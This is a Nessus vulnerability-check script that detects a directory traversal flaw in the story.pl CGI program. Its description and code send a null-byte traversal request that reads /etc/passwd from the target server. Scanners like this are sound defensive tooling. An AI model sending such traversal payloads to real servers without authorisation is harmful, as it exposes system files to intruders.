#
# This script was written by Georges Dagousset <georges.dagousset@alert4web.com>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10817);
 script_cve_id("CAN-2001-0804");
 name["english"] = "Interactive Story Directory Traversal Vulnerability";
 script_name(english:name["english"]);

 desc["english"] = "It is possible to read arbitrary files on
the remote server by requesting :

GET /cgi-bin/story.pl?next=../../../file_to_read%00

An attacker may use this flaw to read arbitary files on
this server.

Solution: Upgrade story.pl to version 1.4.
Risk factor : Serious";

 script_description(english:desc["english"]);

 summary["english"] = "Checks for the presence of /cgi-bin/story.pl";
 script_summary(english:summary["english"]);

 script_category(ACT_GATHER_INFO);

 script_copyright(english:"This script is Copyright (C) 2001 Alert4Web.com");
 family["english"] = "CGI abuses";
 script_family(english:family["english"]);

 script_dependencie("find_service.nes", "httpver.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

cgidir = cgibin();
url[0] = string(cgidir, "/story.pl");
url[1] = string(cgidir, "/story/story.pl");

for(i=0;url[i];i=i+1)
{
 port = is_cgi_installed(url[i]);
 if(port)
 {
  req = string(url[i], "?next=../../../../../etc/passwd%00");
  soc = http_open_socket(port);
  if(soc)
  {
   req = http_get(item:req, port:port);
   send(socket:soc, data:req);
   buf = recv(socket:soc, length:10000);
   close(soc);
   if("root:"><buf)
   {
    security_hole(port);
    exit(0);
   }
  }
  req = string(url[i], "?next=about");
  soc = http_open_socket(port);
  if(soc)
  {
   req = http_get(item:req, port:port);
   send(socket:soc, data:req);
   buf = recv(socket:soc, length:10000);
   close(soc);
   if (ereg(pattern:"This is version 1\.[0-3] of the story program", string:buf))
   {
    security_hole(port:port);
    exit(0);
   }
  }
 }
}
